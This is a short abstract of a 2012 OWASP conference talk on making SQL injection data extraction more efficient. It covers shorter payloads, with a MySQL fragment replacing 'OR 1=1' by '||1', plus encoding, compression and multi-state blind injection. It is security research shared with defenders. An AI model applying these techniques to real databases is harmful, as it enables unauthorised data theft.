Harder, Better, Faster, Stronger... presented at OWASP AppSecAsiaPac 2012

by Luke Jahnke,

Tags: Security

Summary : SQL Injection vulnerabilities are common and relatively well-known, however, most current discussion of SQL injection attacks focus on WAF bypass or gaining more access to the system (e.g. code execution). This talk focuses on how to be more efficient in retrieving the information stored within the database.
This talk contains three major components: Firstly: How to reduce the size of SQL injection attacks, for example, replacing "OR 1=1" with "||1" in MySQL, as well as how some functions can help reduce exploit size.
Secondly: How to retrieve more information with only a single request, for example, how to utilise information encoding, compression functions and previous knowledge (such as data-type and format) to retrieve more data.
Finally: How to retrieve more information using more states; blind SQL injection exploitation is based on boolean states, but in some situations, more states can be created.